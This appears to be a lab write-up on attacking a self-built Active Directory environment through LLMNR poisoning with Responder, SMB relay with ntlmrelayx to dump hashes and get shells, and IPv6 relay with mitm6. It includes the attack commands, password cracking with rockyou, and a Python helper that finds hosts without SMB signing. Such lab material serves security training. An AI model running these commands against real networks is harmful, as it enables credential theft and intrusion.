AD Attack Lab Part Two (LLMNR poisoning, SMB relay, and IPv6 attack)
In part two of the AD attack lab series, we will learn how to perform LLMNR poisoning, SMB relay, and the IPv6 attack against the AD environment. If you do not have the AD environment set up yet, go to "AD attack lab part one" and follow the instructions to set the lab up. Note, I have changed my VM specs in this lab. Currently there are 4 VMs: Windows Server 2019, Windows 10 (2x), and Kali 2020.3. Each VM is assigned 1 GB RAM and 1 processor, and they all use the NAT network. If you do not have Kali installed yet, head over here to grab the latest version of Kali. Now, let's dive into the lab setup.
wget https://bootstrap.pypa.io/get-pip.py
sudo python get-pip.py
wget https://github.com/SecureAuthCorp/impacket/releases/download/impacket_0_9_19/impacket-0.9.19.tar.gz
tar -xzf impacket-0.9.19.tar.gz
cd impacket-0.9.19/
pip install .
sudo pip install .
Note, we will use Impacket 0.9.19 in this lab because of compatibility issues with some of the tools we are going to use. Also, notice that get-pip.py is run with Python 2.7, so the resulting pip installs packages for Python 2.7.
Perform LLMNR poisoning
Start all 4 VMs. In Kali, start Responder on eth0 (in this case) in verbose mode. On one of the Windows 10 clients, log in and try to access the Kali machine as a network drive. Note, this demonstrates the scenario where someone on the network mistypes a network drive name: DNS cannot resolve it, Windows falls back to LLMNR, and Responder answers the LLMNR query claiming to be the requested host. The Windows 10 machine then authenticates to Responder and hands over its NTLMv2 hash. Note, 192.168.200.160 is the IP of Kali.
- Start the Responder
sudo responder -I eth0 -rdwv
- Access our Kali machine as a network drive from Windows 10
Note, if your computers are not visible in the network, you need to go to "Services" and turn on "Function Discovery Resource Publication".
- Save the hash in a file, and use the "rockyou" wordlist with "Hashcat" to crack the hash
We see the Administrator’s password is “password”.
- Do an Nmap scan to check whether SMB signing is enforced
sudo nmap --script=smb2-security-mode.nse -p445 192.168.200.0/24
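As an added example (not part of the original post), the following Python helper parses the output of the Nmap smb2-security-mode scan above and lists the hosts whose SMB servers still accept unsigned sessions, i.e. the ones that should have "Digitally sign communications (always)" enforced before a relay can succeed. The sample scan text and the host 192.168.200.161 are constructed for this example.

```python
import re
from typing import Dict, List

# Constructed sample of `nmap --script=smb2-security-mode.nse -p445` output;
# the hosts and results are made up for this example, not a real scan.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 192.168.200.153

Host script results:
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required

Nmap scan report for 192.168.200.161

Host script results:
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)", re.MULTILINE)
SIGNING_RE = re.compile(r"Message signing (.+?)\s*$", re.MULTILINE)


def parse_smb_signing(nmap_text: str) -> Dict[str, str]:
    """Map each scanned host to 'required', 'not_required' or 'unknown'."""
    results = {}
    # re.split with a capturing group yields [prefix, host, body, host, body, ...]
    chunks = HOST_RE.split(nmap_text)[1:]
    for host, body in zip(chunks[0::2], chunks[1::2]):
        match = SIGNING_RE.search(body)
        if match is None:
            results[host] = "unknown"       # port closed or script gave no result
        elif "not required" in match.group(1) or "disabled" in match.group(1):
            results[host] = "not_required"  # accepts unsigned sessions: relayable
        else:
            results[host] = "required"      # signing enforced: relay is rejected
    return results


def relay_exposed_hosts(nmap_text: str) -> List[str]:
    """Hosts that still need SMB signing enforced via Group Policy."""
    return sorted(h for h, v in parse_smb_signing(nmap_text).items() if v == "not_required")


if __name__ == "__main__":
    for host in relay_exposed_hosts(SAMPLE_NMAP_OUTPUT):
        print(f"{host}: SMB signing not required -> remediate via GPO")
```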
- Turn off the SMB and HTTP servers in the Responder configuration file, so that ntlmrelayx.py handles the incoming authentication instead
- Start Responder and "ntlmrelayx.py" on the Kali machine
Now the received hash is relayed to the target and used to dump the local hashes on that machine.
Shell Access via SMB relay
We can access the different shares from the shell, including C$ and ADMIN$.
- Obtain a shell via Metasploit
Use the following module and set the variables as shown in the image:
- Obtain a shell via “psexec.py”
IPv6 Attack via MITM6
- Install mitm6
Note, the image shows I used Python 3, but I changed to Python 2.7 later.
- Install the LDAPS certificate on the server
Note, if you cannot connect to LDAPS, try troubleshooting. I had to roll back to the previous snapshot and re-install the CA role because, for some reason, my LDAPS wasn't installed the first time.
- Start "mitm6" and "ntlmrelayx.py" at the same time (in two separate terminals)
mitm6 -d kudos.local
sudo ntlmrelayx.py -6 -t ldaps://192.168.200.153 -wh fakewpad.kudos.local -l lootme
In this post, we learned how to use LLMNR poisoning, SMB relay, and the IPv6 attack against a misconfigured AD environment. In the following posts, I will continue to discuss other ways to enumerate and attack the AD environment. Thank you for reading :)